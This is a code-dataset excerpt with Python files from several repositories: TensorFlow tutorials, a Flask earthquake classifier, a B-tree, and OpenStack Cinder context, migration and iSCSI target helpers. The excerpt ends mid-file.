repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
apastoriza/tf-ninja | tfninja/tf101/model101.py | <reponame>apastoriza/tf-ninja
# coding=utf-8
import numpy as np
import tensorflow as tf
from tfninja.utils import loggerfactory
logger = loggerfactory.get_logger(__name__)
SCALAR = tf.constant(100)
VECTOR = tf.constant([1, 2, 3, 4, 5])
MATRIX = tf.constant([[1, 2, 3], [4, 5, 6]])
CUBE_MATRIX = tf.constant([
[
[1], [2], [3]
], [
[4], [5], [6]
], [
[7], [8], [9]
]
])
logger.info('scalar (native): %s', SCALAR.get_shape())
logger.info('vector (native): %s', VECTOR.get_shape())
logger.info('matrix (native): %s', MATRIX.get_shape())
logger.info('cube (native): %s', CUBE_MATRIX.get_shape())
# create a tf.constant() from numpy array
np_vector = np.array([6, 7, 8, 9, 10])
VECTOR2 = tf.constant(np_vector)
logger.info('vector (numpy ): %s', VECTOR2.get_shape())
# another way to create a tensor from numpy array
np_3d = np.array([
[
[0, 1, 2],
[3, 4, 5],
[6, 7, 8]
], [
[9, 10, 11],
[12, 13, 14],
[15, 16, 17]
], [
[18, 19, 20],
[21, 22, 23],
[24, 25, 26]
]
])
TENSOR_3D = tf.convert_to_tensor(np_3d, dtype=tf.float64)
logger.info('tensor_3d (numpy ): %s', TENSOR_3D.get_shape())
|
apastoriza/tf-ninja | tfninja/utils/time.py | <filename>tfninja/utils/time.py
# coding=utf-8
import time
from datetime import datetime
def current_time_in_millis():
return int(round(time.time() * 1000))
def current_time_in_microsecs():
now = datetime.now()
return now.microsecond
|
apastoriza/tf-ninja | tfninja/tf101/session104.py | <filename>tfninja/tf101/session104.py
# coding=utf-8
import numpy as np
import tensorflow as tf
from tfninja.utils import loggerfactory
logger = loggerfactory.get_logger(__name__)
rows = 3
cols = 2
x = tf.placeholder(tf.float32, name='random_matrix', shape=(rows, cols))
add_operation = tf.add(x, x)
def run_session():
data = np.random.rand(rows, cols)
logger.info('\ndata:\n %s', data)
with tf.Session() as session:
result = session.run(add_operation, feed_dict={
x: data
})
logger.info('\nadd result:\n %s', result)
if __name__ == '__main__':
run_session()
|
apastoriza/tf-ninja | tfninja/tf101/session102.py | # coding=utf-8
import tensorflow as tf
from tfninja.utils import loggerfactory
logger = loggerfactory.get_logger(__name__)
value = tf.Variable(0, name='value')
ONE = tf.constant(1)
new_value = tf.add(value, ONE)
update_value = tf.assign(value, new_value)
def run_session():
# Only after running tf.global_variables_initializer() in a session will your variables hold the values you told
# them to hold when you declare them. In this sample, we hold "(tf.Variable(0, name='value'))".
initialize_var = tf.global_variables_initializer()
with tf.Session() as session:
session.run(initialize_var)
output = session.run(value)
logger.info('Variable initial value: %s', output)
for _ in range(10):
# execute assign operation
session.run(update_value)
# Variable value
output = session.run(value)
logger.info('Variable value: %s', output)
if __name__ == '__main__':
run_session()
|
apastoriza/tf-ninja | tfninja/tf102/softmax101.py | # coding=utf-8
import math
def run_softmax():
z = [1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 3.0]
print([round(i, 3) for i in z])
z_exp = [math.exp(i) for i in z]
print([round(i, 3) for i in z_exp])
sum_z_exp = sum(z_exp)
# print(round(sum_z_exp, 2))
softmax = [round(i / sum_z_exp, 3) for i in z_exp]
print(softmax)
if __name__ == '__main__':
run_softmax()
|
apastoriza/tf-ninja | tfninja/tf102/softmax102_relu_dropout.py | <reponame>apastoriza/tf-ninja<gh_stars>0
# coding=utf-8
import math
import numpy as np
import tensorflow as tf
from random import randint
from tfninja.resources import config
from tfninja.resources import mnist_input_data
from tfninja.utils import loggerfactory
from tfninja.utils import time
logger = loggerfactory.get_logger(__name__)
BATCH_SIZE = 100
TRAINING_EPOCHS = 1000
EXPECTED_ACCURACY = 0.973
MAX_LEARNING_RATE = 0.003
MIN_LEARNING_RATE = 0.0001
DECAY_SPEED = 2000
KEEP_PROBABILITY = 0.75
LAYER_NEURONS_1 = 200
LAYER_NEURONS_2 = 100
LAYER_NEURONS_3 = 60
LAYER_NEURONS_4 = 30
LAYER_NEURONS_5 = 10
# About MNIST database
IMAGE_PX_WIDTH = 28
IMAGE_PX_HEIGHT = 28
IMAGE_SIZE = IMAGE_PX_WIDTH * IMAGE_PX_HEIGHT
X_image = tf.placeholder(tf.float32, [None, IMAGE_SIZE], name='input')
Y_probabilities = tf.placeholder(tf.float32, [None, LAYER_NEURONS_5])
W_layer_1 = tf.Variable(tf.truncated_normal([IMAGE_SIZE, LAYER_NEURONS_1], stddev=0.1))
bias_tensor_1 = tf.Variable(tf.zeros([LAYER_NEURONS_1]))
W_layer_2 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_1, LAYER_NEURONS_2], stddev=0.1))
bias_tensor_2 = tf.Variable(tf.zeros([LAYER_NEURONS_2]))
W_layer_3 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_2, LAYER_NEURONS_3], stddev=0.1))
bias_tensor_3 = tf.Variable(tf.zeros([LAYER_NEURONS_3]))
W_layer_4 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_3, LAYER_NEURONS_4], stddev=0.1))
bias_tensor_4 = tf.Variable(tf.zeros([LAYER_NEURONS_4]))
W_layer_5 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_4, LAYER_NEURONS_5], stddev=0.1))
bias_tensor_5 = tf.Variable(tf.zeros([LAYER_NEURONS_5]))
XX_flatten_images = tf.reshape(X_image, [-1, IMAGE_SIZE])
# define a dropout ratio
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
# Dropping out the output and connect next layer
Y_output_1 = tf.nn.relu(tf.matmul(XX_flatten_images, W_layer_1) + bias_tensor_1)
Y_dropout_1 = tf.nn.dropout(Y_output_1, keep_prob)
Y_output_2 = tf.nn.relu(tf.matmul(Y_dropout_1, W_layer_2) + bias_tensor_2)
Y_dropout_2 = tf.nn.dropout(Y_output_2, keep_prob)
Y_output_3 = tf.nn.relu(tf.matmul(Y_dropout_2, W_layer_3) + bias_tensor_3)
Y_dropout_3 = tf.nn.dropout(Y_output_3, keep_prob)
Y_output_4 = tf.nn.relu(tf.matmul(Y_dropout_3, W_layer_4) + bias_tensor_4)
Y_dropout_4 = tf.nn.dropout(Y_output_4, keep_prob)
Y_logits = tf.matmul(Y_dropout_4, W_layer_5) + bias_tensor_5
Y = tf.nn.softmax(Y_logits)
softmax_cross_entropy_with_logits = tf.nn.softmax_cross_entropy_with_logits_v2(logits=Y_logits, labels=Y_probabilities)
cross_entropy = tf.reduce_mean(softmax_cross_entropy_with_logits) * 100
correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_probabilities, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# learning rate is a tensor too
learning_rate = tf.placeholder(tf.float32, name='learning_rate')
train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)
def setup_tensor_board(session):
logs_path = config.paths['dir'] + '/logs/tfninja_softmax102_relu_dropout'
tf.summary.scalar('cost', cross_entropy)
tf.summary.scalar('accuracy', accuracy)
summaries = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(logs_path, graph=session.graph)
return summaries, summary_writer
def run_session():
with tf.Session() as session:
session.run(tf.global_variables_initializer())
summaries, summary_writer = setup_tensor_board(session)
logger.info('-------TRAINING INIT-------')
init_time_in_millis = time.current_time_in_millis()
accuracy_value = 0
data_sets = mnist_input_data.gather_data()
epoch = 0
while (epoch < TRAINING_EPOCHS) and (accuracy_value <= EXPECTED_ACCURACY):
batch_count = int(data_sets.train.num_examples / BATCH_SIZE)
for i in range(batch_count):
batch_x, batch_y = data_sets.train.next_batch(BATCH_SIZE)
lr = MIN_LEARNING_RATE + (MAX_LEARNING_RATE - MIN_LEARNING_RATE) * math.exp(-i / DECAY_SPEED)
_, summary = session.run([train_step, summaries], feed_dict={
X_image: batch_x,
Y_probabilities: batch_y,
keep_prob: KEEP_PROBABILITY,
learning_rate: lr
})
summary_writer.add_summary(summary, epoch * batch_count + i)
accuracy_value = accuracy.eval(feed_dict={
X_image: data_sets.test.images,
Y_probabilities: data_sets.test.labels,
keep_prob: KEEP_PROBABILITY
})
if epoch % 10 == 0:
logger.info('Epoch: %s', epoch)
logger.info('Current accuracy: %s', accuracy_value)
epoch += 1
end_time_in_millis = time.current_time_in_millis()
logger.info('Epoch: %s', epoch)
logger.info('-------TRAINING DONE-------')
logger.info('Total time: %s millis', (end_time_in_millis - init_time_in_millis))
logger.info('Expected accuracy: %s', accuracy_value)
predict_numbers(session, data_sets.test)
def predict_numbers(session, test_data_set):
trials = 1000
rights = 0
for _ in range(trials):
num = randint(0, test_data_set.images.shape[0])
img = test_data_set.images[num]
classification = session.run(tf.argmax(Y, 1), feed_dict={
X_image: [img],
keep_prob: KEEP_PROBABILITY
})
if classification[0] == np.argmax(test_data_set.labels[num]):
rights += 1
# logger.debug('Neural Network predicted %s', classification[0])
# logger.debug('Real label is: %s', np.argmax(test_data_set.labels[num]))
else:
logger.error('Neural Network predicted %s', classification[0])
logger.error('Real label is: %s', np.argmax(test_data_set.labels[num]))
logger.info('Real accuracy: %s/%s = %s', rights, trials, (rights / trials))
if __name__ == '__main__':
run_session()
|
syukronahmd/Machine-Learning | app/run.py | import pickle
import pandas as pd
from flask import Flask, render_template, request
app = Flask(__name__)
model = pickle.load(open('gempa.sav', 'rb'))
@app.route("/")
def home():
return render_template("home.html")
@app.route("/visualization")
def visualization():
return render_template("visualization.html")
@app.route("/classification", methods=["GET", "POST"])
def classification():
if request.method == "POST":
latitude = request.form.get('latitude') or 0
longitude = request.form.get('longitude') or 0
depth = request.form.get('depth') or 0
magnitude = request.form.get('magnitude') or 0
features = [[latitude, longitude, depth, magnitude]]
df = pd.DataFrame(features, columns=['Latitude', 'Longitude', 'Depth', 'Magnitude'])
binary_value = str([i for i in model.predict(df)][0])
result = "Earthquake" if binary_value == "1" else "Not Earthquake"
return render_template("classification.html", result=result)
return render_template("classification.html")
if __name__ == "__main__":
app.run() |
airnandez/lsst-jupyter-kernel | lsst_distrib/kernel_launcher.py | <reponame>airnandez/lsst-jupyter-kernel<gh_stars>0
import sys
import os
import runpy
from typing import List
def reorder_paths(paths: List[str], prefix: str = None) -> List[str]:
if prefix is None:
return paths
head = [p for p in paths if p.startswith(prefix) or p == '']
tail = [p for p in paths if not p in head]
return head + tail
if __name__ == '__main__':
sys.path = reorder_paths(sys.path, os.environ.get('CONDA_PREFIX'))
runpy.run_module('ipykernel_launcher', run_name='__main__')
|
shanizalh/portfolio | database-key-value/btree.py | class Node:
def __init__(self, keys=None, children=None):
self.keys = keys or []
self.children = children or []
def is_leaf(self):
return len(self.children) == 0
def __repr__(self):
# Helpful method to keep track of Node keys.
return "<Node: {}>".format(self.keys)
class BTree:
def __init__(self, t):
self.t = t
self.root = None
def insert_multiple(self, keys):
for key in keys:
self.insert(key)
def insert(self, key):
if not self.root:
self.root = Node(keys=[key])
return
if len(self.root.keys) == 2*self.t - 1:
old_root = self.root
self.root = Node()
left, right, new_key = self.split(old_root)
self.root.keys.append(new_key)
self.root.children.append(left)
self.root.children.append(right)
self.insert_non_full(self.root, key)
def insert_non_full(self, node, key):
if node.is_leaf():
index = 0
for k in node.keys:
if key > k: index += 1
else: break
node.keys.insert(index, key)
return
index = 0
for k in node.keys:
if key > k: index += 1
else: break
if len(node.children[index].keys) == 2*self.t - 1:
left_node, right_node, new_key = self.split(node.children[index])
node.keys.insert(index, new_key)
node.children[index] = left_node
node.children.insert(index+1, right_node)
if key > new_key:
index += 1
self.insert_non_full(node.children[index], key)
def split(self, node):
left_node = Node(
keys=node.keys[:len(node.keys)//2],
children=node.children[:len(node.children)//2+1]
)
right_node = Node(
keys=node.keys[len(node.keys)//2:],
children=node.children[len(node.children)//2:]
)
key = right_node.keys.pop(0)
return left_node, right_node, key
def search(self, node, term):
if not self.root:
return None
index = 0
for key in node.keys:
if key == term:
return key.value
if term > key:
index += 1
if node.is_leaf():
return None
return self.search(node.children[index], term)
def greater_than(self, node, term, upper_bound=None, inclusive=False):
if not self.root:
return []
index = 0
values = []
for key in node.keys:
if upper_bound is not None:
if inclusive and key == upper_bound:
values.append(key)
if key >= upper_bound:
break
if term > key:
index += 1
continue
if inclusive and key == term:
values.append(key)
if key > term:
values.append(key)
if not node.is_leaf():
values += self.greater_than(
node.children[index],
term,
upper_bound,
inclusive
)
index += 1
if not node.is_leaf():
values += self.greater_than(
node.children[index],
term,
upper_bound,
inclusive
)
return values
def less_than(self, node, term, lower_bound=None, inclusive=False):
if not self.root:
return []
index = 0
values = []
for key in node.keys:
if lower_bound is not None:
if inclusive and key == lower_bound:
values.append(key)
if key < lower_bound:
index += 1
continue
if inclusive and key == term:
values.append(key)
if key < term:
values.append(key)
if not node.is_leaf():
values += self.less_than(
node.children[index],
term,
lower_bound,
inclusive
)
index += 1
if not node.is_leaf() and key <= term:
values += self.less_than(
node.children[index],
term,
lower_bound,
inclusive
)
return values
class NodeKey:
def __init__(self, key, value):
self.key = key
self.value = value
def __repr__(self):
return '<NodeKey: ({}, {})>'.format(self.key, self.value)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.key == other.key
return self.key == other
def __gt__(self, other):
if isinstance(other, self.__class__):
return self.key > other.key
return self.key > other
def __ge__(self, other):
if isinstance(other, self.__class__):
return self.key >= other.key
return self.key >= other
def __lt__(self, other):
if isinstance(other, self.__class__):
return self.key < other.key
return self.key < other
def __le__(self, other):
if isinstance(other, self.__class__):
return self.key <= other.key
return self.key <= other
|
adelina-t/cinder | cinder/context.py | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of cinder."""
import copy
import uuid
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import local
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder import policy
LOG = logging.getLogger(__name__)
def generate_request_id():
return 'req-' + str(uuid.uuid4())
class RequestContext(object):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
user_idt_format = '{user} {tenant} {domain} {user_domain} {p_domain}'
def __init__(self, user_id, project_id, is_admin=None, read_deleted="no",
roles=None, project_name=None, remote_address=None,
timestamp=None, request_id=None, auth_token=None,
overwrite=True, quota_class=None, service_catalog=None,
domain=None, user_domain=None, project_domain=None,
**kwargs):
"""Initialize RequestContext.
:param read_deleted: 'no' indicates deleted records are hidden, 'yes'
indicates deleted records are visible, 'only' indicates that
*only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
self.user_id = user_id
self.project_id = project_id
self.domain = domain
self.user_domain = user_domain
self.project_domain = project_domain
self.roles = roles or []
self.project_name = project_name
self.is_admin = is_admin
if self.is_admin is None:
self.is_admin = policy.check_is_admin(self.roles)
elif self.is_admin and 'admin' not in self.roles:
self.roles.append('admin')
self.read_deleted = read_deleted
self.remote_address = remote_address
if not timestamp:
timestamp = timeutils.utcnow()
if isinstance(timestamp, basestring):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
if not request_id:
request_id = generate_request_id()
self.request_id = request_id
self.auth_token = auth_token
self.quota_class = quota_class
if overwrite or not hasattr(local.store, 'context'):
self.update_store()
if service_catalog:
# Only include required parts of service_catalog
self.service_catalog = [s for s in service_catalog
if s.get('type') in ('compute',)]
else:
# if list is empty or none
self.service_catalog = []
def _get_read_deleted(self):
return self._read_deleted
def _set_read_deleted(self, read_deleted):
if read_deleted not in ('no', 'yes', 'only'):
raise ValueError(_("read_deleted can only be one of 'no', "
"'yes' or 'only', not %r") % read_deleted)
self._read_deleted = read_deleted
def _del_read_deleted(self):
del self._read_deleted
read_deleted = property(_get_read_deleted, _set_read_deleted,
_del_read_deleted)
def update_store(self):
local.store.context = self
def to_dict(self):
user_idt = (
self.user_idt_format.format(user=self.user or '-',
tenant=self.tenant or '-',
domain=self.domain or '-',
user_domain=self.user_domain or '-',
p_domain=self.project_domain or '-'))
return {'user_id': self.user_id,
'project_id': self.project_id,
'project_name': self.project_name,
'domain': self.domain,
'user_domain': self.user_domain,
'project_domain': self.project_domain,
'is_admin': self.is_admin,
'read_deleted': self.read_deleted,
'roles': self.roles,
'remote_address': self.remote_address,
'timestamp': timeutils.strtime(self.timestamp),
'request_id': self.request_id,
'auth_token': self.auth_token,
'quota_class': self.quota_class,
'service_catalog': self.service_catalog,
'tenant': self.tenant,
'user': self.user,
'user_identity': user_idt}
@classmethod
def from_dict(cls, values):
return cls(**values)
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
context = copy.copy(self)
context.is_admin = True
if 'admin' not in context.roles:
context.roles.append('admin')
if read_deleted is not None:
context.read_deleted = read_deleted
return context
def deepcopy(self):
return copy.deepcopy(self)
# NOTE(sirp): the openstack/common version of RequestContext uses
# tenant/user whereas the Cinder version uses project_id/user_id. We need
# this shim in order to use context-aware code from openstack/common, like
# logging, until we make the switch to using openstack/common's version of
# RequestContext.
@property
def tenant(self):
return self.project_id
@property
def user(self):
return self.user_id
def get_admin_context(read_deleted="no"):
return RequestContext(user_id=None,
project_id=None,
is_admin=True,
read_deleted=read_deleted,
overwrite=False)
|
adelina-t/cinder | cinder/db/sqlalchemy/migration.py | <filename>cinder/db/sqlalchemy/migration.py
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
import sqlalchemy
from cinder.db.sqlalchemy.api import get_engine
from cinder import exception
from cinder.openstack.common.gettextutils import _
INIT_VERSION = 000
_REPOSITORY = None
def db_sync(version=None):
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.Error(_("version should be an integer"))
current_version = db_version()
repository = _find_migrate_repo()
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version():
repository = _find_migrate_repo()
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
tables = meta.tables
if len(tables) == 0:
db_version_control(INIT_VERSION)
return versioning_api.db_version(get_engine(), repository)
else:
raise exception.Error(_("Upgrade DB using Essex release first."))
def db_initial_version():
return INIT_VERSION
def db_version_control(version=None):
repository = _find_migrate_repo()
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
global _REPOSITORY
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
if _REPOSITORY is None:
_REPOSITORY = Repository(path)
return _REPOSITORY
|
adelina-t/cinder | cinder/brick/iscsi/iscsi.py | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper code for the iSCSI volume driver.
"""
import contextlib
import os
import re
import stat
import time
from cinder.brick import exception
from cinder.brick import executor
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
LOG = logging.getLogger(__name__)
class TargetAdmin(executor.Executor):
"""iSCSI target administration.
Base class for iSCSI target admin helpers.
"""
def __init__(self, cmd, root_helper, execute):
super(TargetAdmin, self).__init__(root_helper, execute=execute)
self._cmd = cmd
def _run(self, *args, **kwargs):
self._execute(self._cmd, *args, run_as_root=True, **kwargs)
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
"""Create an iSCSI target and logical unit."""
raise NotImplementedError()
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
"""Remove an iSCSI target and logical unit."""
raise NotImplementedError()
def _new_target(self, name, tid, **kwargs):
"""Create a new iSCSI target."""
raise NotImplementedError()
def _delete_target(self, tid, **kwargs):
"""Delete a target."""
raise NotImplementedError()
def show_target(self, tid, iqn=None, **kwargs):
"""Query the given target ID."""
raise NotImplementedError()
def _new_logicalunit(self, tid, lun, path, **kwargs):
"""Create a new LUN on a target using the supplied path."""
raise NotImplementedError()
def _delete_logicalunit(self, tid, lun, **kwargs):
"""Delete a logical unit from a target."""
raise NotImplementedError()
class TgtAdm(TargetAdmin):
"""iSCSI target administration using tgtadm."""
VOLUME_CONF = """
<target %s>
backing-store %s
lld iscsi
</target>
"""
VOLUME_CONF_WITH_CHAP_AUTH = """
<target %s>
backing-store %s
lld iscsi
%s
</target>
"""
def __init__(self, root_helper, volumes_dir,
target_prefix='iqn.2010-10.org.openstack:',
execute=putils.execute):
super(TgtAdm, self).__init__('tgtadm', root_helper, execute)
self.iscsi_target_prefix = target_prefix
self.volumes_dir = volumes_dir
def _get_target(self, iqn):
(out, err) = self._execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line:
parsed = line.split()
tid = parsed[1]
return tid[:-1]
return None
def _verify_backing_lun(self, iqn, tid):
backing_lun = True
capture = False
target_info = []
(out, err) = self._execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line and "Target %s" % tid in line:
capture = True
if capture:
target_info.append(line)
if iqn not in line and 'Target ' in line:
capture = False
if ' LUN: 1' not in target_info:
backing_lun = False
return backing_lun
def _recreate_backing_lun(self, iqn, tid, name, path):
LOG.warning(_('Attempting recreate of backing lun...'))
# Since we think the most common case of this is a dev busy
# (create vol from snapshot) we're going to add a sleep here
# this will hopefully give things enough time to stabilize
# how long should we wait?? I have no idea, let's go big
# and error on the side of caution
time.sleep(10)
try:
(out, err) = self._execute('tgtadm', '--lld', 'iscsi',
'--op', 'new', '--mode',
'logicalunit', '--tid',
tid, '--lun', '1', '-b',
path, run_as_root=True)
LOG.debug('StdOut from recreate backing lun: %s' % out)
LOG.debug('StdErr from recreate backing lun: %s' % err)
except putils.ProcessExecutionError as e:
LOG.error(_("Failed to recover attempt to create "
"iscsi backing lun for volume "
"id:%(vol_id)s: %(e)s")
% {'vol_id': name, 'e': e})
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# Note(jdg) tid and lun aren't used by TgtAdm but remain for
# compatibility
fileutils.ensure_tree(self.volumes_dir)
vol_id = name.split(':')[1]
if chap_auth is None:
volume_conf = self.VOLUME_CONF % (name, path)
else:
volume_conf = self.VOLUME_CONF_WITH_CHAP_AUTH % (name,
path, chap_auth)
LOG.info(_('Creating iscsi_target for: %s') % vol_id)
volumes_dir = self.volumes_dir
volume_path = os.path.join(volumes_dir, vol_id)
f = open(volume_path, 'w+')
f.write(volume_conf)
f.close()
LOG.debug('Created volume path %(vp)s,\n'
'content: %(vc)s'
% {'vp': volume_path, 'vc': volume_conf})
old_persist_file = None
old_name = kwargs.get('old_name', None)
if old_name is not None:
old_persist_file = os.path.join(volumes_dir, old_name)
try:
# with the persistent tgts we create them
# by creating the entry in the persist file
# and then doing an update to get the target
# created.
(out, err) = self._execute('tgt-admin', '--update', name,
run_as_root=True)
LOG.debug("StdOut from tgt-admin --update: %s", out)
LOG.debug("StdErr from tgt-admin --update: %s", err)
# Grab targets list for debug
# Consider adding a check for lun 0 and 1 for tgtadm
# before considering this as valid
(out, err) = self._execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets after update: %s" % out)
except putils.ProcessExecutionError as e:
LOG.warning(_("Failed to create iscsi target for volume "
"id:%(vol_id)s: %(e)s")
% {'vol_id': vol_id, 'e': e})
#Don't forget to remove the persistent file we created
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
tid = self._get_target(iqn)
if tid is None:
LOG.error(_("Failed to create iscsi target for volume "
"id:%(vol_id)s. Please ensure your tgtd config file "
"contains 'include %(volumes_dir)s/*'") % {
'vol_id': vol_id,
'volumes_dir': volumes_dir, })
raise exception.NotFound()
# NOTE(jdg): Sometimes we have some issues with the backing lun
# not being created, believe this is due to a device busy
# or something related, so we're going to add some code
# here that verifies the backing lun (lun 1) was created
# and we'll try and recreate it if it's not there
if not self._verify_backing_lun(iqn, tid):
try:
self._recreate_backing_lun(iqn, tid, name, path)
except putils.ProcessExecutionError:
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Finally check once more and if no go, fail and punt
if not self._verify_backing_lun(iqn, tid):
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
if old_persist_file is not None and os.path.exists(old_persist_file):
os.unlink(old_persist_file)
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info(_('Removing iscsi_target for: %s') % vol_id)
vol_uuid_file = vol_name
volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
if not os.path.exists(volume_path):
LOG.warning(_('Volume path %s does not exist, '
'nothing to remove.') % volume_path)
return
if os.path.isfile(volume_path):
iqn = '%s%s' % (self.iscsi_target_prefix,
vol_uuid_file)
else:
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
# NOTE(vish): --force is a workaround for bug:
# https://bugs.launchpad.net/cinder/+bug/1159948
self._execute('tgt-admin',
'--force',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_("Failed to remove iscsi target for volume "
"id:%(vol_id)s: %(e)s")
% {'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): There's a bug in some versions of tgt that
# will sometimes fail silently when using the force flag
# https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
# For now work-around by checking if the target was deleted,
# if it wasn't, try again without the force.
# This will NOT do any good for the case of multiple sessions
# which the force was aded for but it will however address
# the cases pointed out in bug:
# https://bugs.launchpad.net/cinder/+bug/1304122
if self._get_target(iqn):
try:
LOG.warning(_('Silent failure of target removal '
'detected, retry....'))
self._execute('tgt-admin',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_("Failed to remove iscsi target for volume "
"id:%(vol_id)s: %(e)s")
% {'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): This *should* be there still but incase
# it's not we don't care, so just ignore it if was
# somehow deleted between entry of this method
# and here
if os.path.exists(volume_path):
os.unlink(volume_path)
else:
LOG.debug('Volume path %s not found at end, '
'of remove_iscsi_target.' % volume_path)
def show_target(self, tid, iqn=None, **kwargs):
if iqn is None:
raise exception.InvalidParameterValue(
err=_('valid iqn needed for show_target'))
tid = self._get_target(iqn)
if tid is None:
raise exception.NotFound()
class IetAdm(TargetAdmin):
"""iSCSI target administration using ietadm."""
def __init__(self, root_helper, iet_conf='/etc/iet/ietd.conf',
iscsi_iotype='fileio', execute=putils.execute):
super(IetAdm, self).__init__('ietadm', root_helper, execute)
self.iet_conf = iet_conf
self.iscsi_iotype = iscsi_iotype
def _is_block(self, path):
mode = os.stat(path).st_mode
return stat.S_ISBLK(mode)
def _iotype(self, path):
if self.iscsi_iotype == 'auto':
return 'blockio' if self._is_block(path) else 'fileio'
else:
return self.iscsi_iotype
@contextlib.contextmanager
def temporary_chown(self, path, owner_uid=None):
"""Temporarily chown a path.
:params path: The path to chown
:params owner_uid: UID of temporary owner (defaults to current user)
"""
if owner_uid is None:
owner_uid = os.getuid()
orig_uid = os.stat(path).st_uid
if orig_uid != owner_uid:
putils.execute('chown', owner_uid, path,
root_helper=self._root_helper, run_as_root=True)
try:
yield
finally:
if orig_uid != owner_uid:
putils.execute('chown', orig_uid, path,
root_helper=self._root_helper, run_as_root=True)
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# NOTE (jdg): Address bug: 1175207
kwargs.pop('old_name', None)
self._new_target(name, tid, **kwargs)
self._new_logicalunit(tid, lun, path, **kwargs)
if chap_auth is not None:
(type, username, password) = chap_auth.split()
self._new_auth(tid, type, username, password, **kwargs)
conf_file = self.iet_conf
if os.path.exists(conf_file):
try:
volume_conf = """
Target %s
%s
Lun 0 Path=%s,Type=%s
""" % (name, chap_auth, path, self._iotype(path))
with self.temporary_chown(conf_file):
f = open(conf_file, 'a+')
f.write(volume_conf)
f.close()
except putils.ProcessExecutionError as e:
vol_id = name.split(':')[1]
LOG.error(_("Failed to create iscsi target for volume "
